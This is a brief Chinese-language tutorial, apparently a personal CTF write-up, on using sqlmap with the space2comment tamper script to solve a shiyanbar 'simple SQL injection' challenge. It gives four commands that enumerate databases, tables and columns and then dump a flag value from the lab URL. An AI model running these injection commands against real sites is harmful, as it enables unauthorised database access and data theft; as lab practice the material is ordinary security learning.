sqlmap用法

1、如果是空格过滤，需要两个空格的时候，参数为--tamper=space2comment

实例：实验吧简单的sql注入1、

第一步（查数据库，查当前数据库是--current-db）

sqlmap -u "http://ctf5.shiyanbar.com/423/web/?id=1" --tamper=space2comment --dbs

第二步（已知数据库查表）

sqlmap -u "http://ctf5.shiyanbar.com/423/web/?id=1" --tamper=space2comment -D web1 --tables

第三步（已知表查字段）

sqlmap -u "http://ctf5.shiyanbar.com/423/web/?id=1" --tamper=space2comment -D web1 -T flag --columns

第四步（已知字段查值）

sqlmap -u "http://ctf5.shiyanbar.com/423/web/?id=1" --tamper=space2comment -D web1 -T flag -C flag --dump

太不容易啦哇哇哇

（未完待续）